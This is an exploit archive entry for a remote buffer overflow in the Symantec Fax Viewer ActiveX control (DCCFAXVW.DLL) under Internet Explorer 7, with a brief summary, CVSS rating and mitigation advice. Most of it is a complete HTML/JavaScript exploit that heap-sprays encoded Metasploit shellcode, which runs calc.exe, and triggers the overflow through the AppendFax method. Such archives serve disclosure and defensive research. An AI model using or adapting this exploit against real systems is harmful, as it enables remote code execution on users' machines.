Symantec Fax Viewer Control v10 (DCCFAXVW.DLL) remote buffer overflow exploit (IE7)

vendor:

WinFax Pro

by:

Nine:Situations:Group::trotzkista

7.5

CVSS

HIGH

Remote Buffer Overflow

CWE

Product Name: WinFax Pro

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows XP SP3

Symantec Fax Viewer Control v10 (DCCFAXVW.DLL) remote buffer overflow exploit (IE7)

This exploit targets the Symantec Fax Viewer Control v10 (DCCFAXVW.DLL) and is specifically designed for Internet Explorer 7. It allows an attacker to remotely overflow the buffer, potentially leading to code execution on the targeted system.

Mitigation:

Patch or update the affected software to the latest version. Avoid using Internet Explorer 7, as it is no longer supported and may contain additional vulnerabilities.

Source

Exploit-DB raw data:

<!--
Symantec Fax Viewer Control v10 (DCCFAXVW.DLL) remote buffer overflow exploit (IE7)
by Nine:Situations:Group::trotzkista
site: http://retrogod.altervista.org/

tested against: Symantec WinFax Pro 10.03
                Internet Explorer 7, XP SP3

some details:
CLSID: {C05A1FBC-1413-11D1-B05F-00805F4945F6}
Progid: Symantec.FaxViewerControl.1
Binary Path: C:\Programmi\WinFax\DCCFAXVW.DLL
KillBitted: False
Implements IObjectSafety: False
Safe For Initialization (Registry): True
Safe For Scripting (Registry): True
-->
<html>
<object classid='clsid:C05A1FBC-1413-11D1-B05F-00805F4945F6' id='obj' />
</object>
<script language='javascript'>
// win32_exec -  EXITFUNC=seh CMD=c:\windows\system32\calc.exe Size=378 Encoder=Alpha2 http://metasploit.com
var scode =      unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949" +
                          "%u4948%u4949%u4949%u4949%u4949%u4949%u5a51%u436a" +
                          "%u3058%u3142%u4250%u6b41%u4142%u4253%u4232%u3241" +
                          "%u4141%u4130%u5841%u3850%u4242%u4875%u6b69%u4d4c" +
                          "%u6338%u7574%u3350%u6730%u4c70%u734b%u5775%u6e4c" +
                          "%u636b%u454c%u6355%u3348%u5831%u6c6f%u704b%u774f" +
                          "%u6e68%u736b%u716f%u6530%u6a51%u724b%u4e69%u366b" +
                          "%u4e54%u456b%u4a51%u464e%u6b51%u4f70%u4c69%u6e6c" +
                          "%u5964%u7350%u5344%u5837%u7a41%u546a%u334d%u7831" +
                          "%u4842%u7a6b%u7754%u524b%u6674%u3444%u6244%u5955" +
                          "%u6e75%u416b%u364f%u4544%u6a51%u534b%u4c56%u464b" +
                          "%u726c%u4c6b%u534b%u376f%u636c%u6a31%u4e4b%u756b" +
                          "%u6c4c%u544b%u4841%u4d6b%u5159%u514c%u3434%u4a44" +
                          "%u3063%u6f31%u6230%u4e44%u716b%u5450%u4b70%u6b35" +
                          "%u5070%u4678%u6c6c%u634b%u4470%u4c4c%u444b%u3530" +
                          "%u6e4c%u6c4d%u614b%u5578%u6a58%u644b%u4e49%u6b6b" +
                          "%u6c30%u5770%u5770%u4770%u4c70%u704b%u4768%u714c" +
                          "%u444f%u6b71%u3346%u6650%u4f36%u4c79%u6e38%u4f63" +
                          "%u7130%u306b%u4150%u5878%u6c70%u534a%u5134%u334f" +
                          "%u4e58%u3978%u6d6e%u465a%u616e%u4b47%u694f%u6377" +
                          "%u4553%u336a%u726c%u3057%u5069%u626e%u7044%u736f" +
                          "%u4147%u4163%u504c%u4273%u3159%u5063%u6574%u7035" +
                          "%u546d%u6573%u3362%u306c%u4163%u7071%u536c%u6653" +
                          "%u314e%u7475%u7038%u7765%u4370");
bigblock  = unescape("%u0c0c%u0c0c");
headersize = 20;
slackspace = headersize+scode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (i=0;i<444;i++){memory[i] = block+scode}
</script>
<script language="vbscript">
obj.AppendFax string(1111,unescape("%0c"))
</script>

# milw0rm.com [2009-04-29]